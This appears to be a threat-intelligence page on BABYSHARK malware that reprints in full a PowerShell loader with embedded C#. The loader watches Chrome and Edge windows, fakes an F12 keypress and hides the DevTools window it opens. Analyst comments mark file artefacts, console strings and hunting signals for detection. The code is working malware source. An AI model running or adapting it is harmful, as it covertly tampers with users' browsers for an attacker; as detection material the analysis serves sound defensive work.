BABYSHARK malware indicators of compromise
# Analyst notes: PowerShell loader that compiles the embedded C# below at run time with
# Add-Type (Add-Type typically spawns csc.exe and leaves temporary .cs/.dll files under
# %TEMP% -- a hunting signal) and then calls g1.P1.M1, which never returns. The comments
# added inside the C# describe the observed behaviour for detection and triage only; the
# code itself is reproduced unchanged.
Add-Type -TypeDefinition @" | |
using System; | |
using System.IO; | |
using System.Text; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Windows.Forms; | |
namespace g1 | |
{ | |
// Watches the foreground browser window (Chrome / Edge). When the window title carries the
// "Tab+" marker and that title has not been recorded before, the title is persisted, an F12
// keystroke is synthesised and the DevTools window that subsequently appears is hidden.
// Host artefacts: two state files, %APPDATA%\Microsoft\tabid_chrome.log and
// %APPDATA%\Microsoft\tabid_edge.log (CSIDL 26 = CSIDL_APPDATA), plus the console strings
// written below, which are usable as static signatures.
public static class P1 | |
{ | |
// Entry point called from the PowerShell wrapper. Runs an unbounded polling loop, so the
// hosting powershell.exe stays resident for as long as the process lives.
public static void M1() | |
{ | |
//------------ chrome -------------- | |
// Marker searched for (case-insensitively) in the browser window title. What places
// "Tab+" in the title is not shown on this page -- presumably a companion component; confirm.
string devsign = "Tab+"; | |
// Semicolon-separated list of titles already handled; seeded with a sentinel value.
StringBuilder tabid_info_chrome = new StringBuilder("nowjohnstart"); | |
StringBuilder tabid_chrome_file = new StringBuilder("",250); | |
// CSIDL 26 (0x1A) is CSIDL_APPDATA, so the state file is %APPDATA%\Microsoft\tabid_chrome.log.
SHGetFolderPath(0,26 ,0,0,tabid_chrome_file); | |
tabid_chrome_file.Append("\\Microsoft\\tabid_chrome.log"); | |
// Reload previously recorded titles so state survives a restart (state persistence only;
// nothing here establishes execution persistence).
if(File.Exists(tabid_chrome_file.ToString())) | |
{ | |
tabid_info_chrome.Clear(); | |
tabid_info_chrome.Append(File.ReadAllText(tabid_chrome_file.ToString())); | |
} | |
//------------- edge --------------- | |
// Same state handling for Edge: %APPDATA%\Microsoft\tabid_edge.log.
StringBuilder tabid_info_edge = new StringBuilder("nowjohnstart"); | |
StringBuilder tabid_edge_file = new StringBuilder("",250); | |
SHGetFolderPath(0,26 ,0,0,tabid_edge_file); | |
tabid_edge_file.Append("\\Microsoft\\tabid_edge.log"); | |
if(File.Exists(tabid_edge_file.ToString())) | |
{ | |
tabid_info_edge.Clear(); | |
tabid_info_edge.Append(File.ReadAllText(tabid_edge_file.ToString())); | |
} | |
// Main polling loop; there is no exit condition.
while(1==1) | |
{ | |
//------------- chrome --------------- | |
// When no chrome process exists the in-memory tracker is re-seeded and the on-disk
// state file is deleted, so recorded titles only live as long as the browser session.
if(Process.GetProcessesByName("chrome").Length == 0) | |
{ | |
tabid_info_chrome.Clear(); | |
tabid_info_chrome.Append("nowjohnstart"); | |
File.Delete(tabid_chrome_file.ToString()); | |
} | |
//------------- edge --------------- | |
// Both the Chromium-based ("msedge") and legacy ("microsoftedge") process names are checked.
if(Process.GetProcessesByName("msedge").Length == 0) | |
{ | |
if(Process.GetProcessesByName("microsoftedge").Length == 0) | |
{ | |
tabid_info_edge.Clear(); | |
tabid_info_edge.Append("nowjohnstart"); | |
File.Delete(tabid_edge_file.ToString()); | |
} | |
} | |
IntPtr hWnd = IntPtr.Zero; | |
hWnd = GetForegroundWindow(); | |
// NOTE(review): with no foreground window the loop continues without any Sleep, i.e. it
// spins at full CPU -- an observable symptom on a locked or idle desktop.
if (hWnd == IntPtr.Zero) | |
{ | |
continue; | |
} | |
// Resolve the process that owns the foreground window and read its title (max 256 chars).
uint PID; | |
GetWindowThreadProcessId(hWnd,out PID); | |
Process pp = Process.GetProcessById((int)PID); | |
string processpath = pp.ProcessName; | |
StringBuilder title = new StringBuilder(256); | |
GetWindowText(hWnd, title, 256); | |
// Chrome branch. The second condition assumes a DevTools window carries "devtools" in
// its title, so such windows are ignored here.
if((processpath.ToString().ToLower() == "chrome") && (title.ToString().ToLower().IndexOf("devtools") == -1)) | |
{ | |
title.Clear(); | |
GetWindowText(hWnd, title, 256); | |
bool dev_click_flag = false; | |
// Act only when the marker is present and the title has not already been recorded.
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1) | |
{ | |
dev_click_flag = true; | |
foreach(string tabid in tabid_info_chrome.ToString().Split(';')) | |
{ | |
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1) | |
{ | |
dev_click_flag = false; | |
Console.WriteLine("exist tabid"); | |
break; | |
} | |
} | |
} | |
if(dev_click_flag == true) | |
{ | |
Console.WriteLine("no exist tabid, click"); | |
dev_click_flag = false; | |
// Record the title from the marker onward and rewrite the whole tracker to the state
// file (File.CreateText overwrites on every sighting).
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower()); | |
tabid_info_chrome.Append(';' + title.ToString().Substring(john_strpos)); | |
using (StreamWriter logFile = File.CreateText(tabid_chrome_file.ToString())) | |
{ | |
logFile.Write(tabid_info_chrome); | |
} | |
// Synthesised F12 press and release: 0x7B is VK_F12, flags 0 = key down, 2 = KEYEVENTF_KEYUP.
// The commented-out PostMessage lines (0x100 WM_KEYDOWN / 0x101 WM_KEYUP) are an earlier variant.
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0); | |
keybd_event((byte)0x7b, 0, (int)(0), 0); | |
Sleep(10); | |
keybd_event((byte)0x7b, 0, (int)(2), 0); | |
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0); | |
// Poll the foreground window for up to ~7 s (700 x 10 ms) for a title containing "devtools";
// once seen it is hidden with ShowWindow(hWnd, 0) (SW_HIDE) and the loop pauses 1.5 s.
// Net effect: the DevTools window exists but is not visible to the user.
int times = 0; | |
bool dev_flag = true; | |
while((dev_flag == true)&&(times < 700)) | |
{ | |
IntPtr hWnd_dev = GetForegroundWindow(); | |
StringBuilder title_dev = new StringBuilder(256); | |
GetWindowText(hWnd_dev, title_dev, 256); | |
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1) | |
{ | |
Console.WriteLine("hide devtool"); | |
ShowWindow(hWnd_dev, 0); | |
dev_flag = false; | |
times = 0; | |
Sleep(1500); | |
} | |
Sleep(10); | |
times = times + 1; | |
} | |
} | |
Sleep(10); | |
} | |
// Edge branch: identical logic to the Chrome branch, keyed on the Edge process names.
// "applicationframehost" presumably covers the UWP-hosted legacy Edge window -- confirm.
else if((processpath.ToString().ToLower() == "applicationframehost" || processpath.ToString().ToLower() == "microsoftedge" || processpath.ToString().ToLower() == "msedge") && (title.ToString().ToLower().IndexOf("devtools") == -1)) | |
{ | |
title.Clear(); | |
GetWindowText(hWnd, title, 256); | |
bool dev_click_flag = false; | |
if(title.ToString().ToLower().IndexOf(devsign.ToLower()) != -1) | |
{ | |
dev_click_flag = true; | |
foreach(string tabid in tabid_info_edge.ToString().Split(';')) | |
{ | |
if(title.ToString().ToLower().IndexOf(tabid.ToLower()) != -1) | |
{ | |
dev_click_flag = false; | |
Console.WriteLine("exist tabid"); | |
break; | |
} | |
} | |
} | |
if(dev_click_flag == true) | |
{ | |
Console.WriteLine("no exist tabid, click"); | |
dev_click_flag = false; | |
int john_strpos = title.ToString().ToLower().IndexOf(devsign.ToLower()); | |
tabid_info_edge.Append(';' + title.ToString().Substring(john_strpos)); | |
using (StreamWriter logFile = File.CreateText(tabid_edge_file.ToString())) | |
{ | |
logFile.Write(tabid_info_edge); | |
} | |
//PostMessage(hWnd, (int)0x100, (IntPtr)0x7B, (IntPtr)0); | |
keybd_event((byte)0x7b, 0, (int)(0), 0); | |
Sleep(10); | |
keybd_event((byte)0x7b, 0, (int)(2), 0); | |
//PostMessage(hWnd, (int)0x101, (IntPtr)0x7B, (IntPtr)0); | |
int times = 0; | |
bool dev_flag = true; | |
while((dev_flag == true)&&(times < 700)) | |
{ | |
IntPtr hWnd_dev = GetForegroundWindow(); | |
StringBuilder title_dev = new StringBuilder(256); | |
GetWindowText(hWnd_dev, title_dev, 256); | |
if(title_dev.ToString().ToLower().IndexOf("devtools") != -1) | |
{ | |
Console.WriteLine("hide devtool"); | |
ShowWindow(hWnd_dev, 0); | |
dev_flag = false; | |
times = 0; | |
Sleep(1500); | |
} | |
Sleep(10); | |
times = times + 1; | |
} | |
} | |
Sleep(10); | |
} | |
// Any other foreground application: back off for 3 s before polling again.
else | |
{ | |
Sleep(3000); | |
Console.WriteLine("BackgroundWindow's not Chrome.exe or Edge.exe"); | |
} | |
} | |
} | |
// P/Invoke surface (user32 / kernel32 / shell32). FindWindow, GetClassName and PostMessage
// are declared but never called in the code shown above.
[DllImport("user32.dll")]static extern bool ShowWindow(IntPtr hW,int nC); | |
[DllImport("kernel32")]public static extern void Sleep(uint dM); | |
[DllImport("User32.dll")]public static extern int FindWindow(string sC,string sW); | |
[DllImport("user32.dll", CharSet = CharSet.Auto)]public static extern int GetWindowText(IntPtr hWnd, StringBuilder title, int size); | |
[DllImport("user32.dll")]public static extern IntPtr GetForegroundWindow(); | |
[DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount); | |
[DllImport("user32.dll")]public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); | |
[DllImport("user32.dll")]public static extern bool PostMessage(IntPtr WindowHandle, int Msg, IntPtr wParam, IntPtr lParam); | |
[DllImport("User32.dll")] | |
public static extern void keybd_event(byte vk, byte scan, int flags, int extra); | |
[DllImport("shell32.dll")] | |
public static extern uint SHGetFolderPath(uint hwnd, uint csidl, uint hToken,uint dwFlags,System.Text.StringBuilder pszSubDir); | |
} | |
} | |
# -ReferencedAssemblies satisfies the "using System.Windows.Forms" directive; nothing from
# that assembly is used in the visible code.
"@ -ReferencedAssemblies System.Windows.Forms; | |
# Blocks forever: M1 never returns, so the hosting PowerShell process does not exit on its own.
[g1.P1]::M1(); |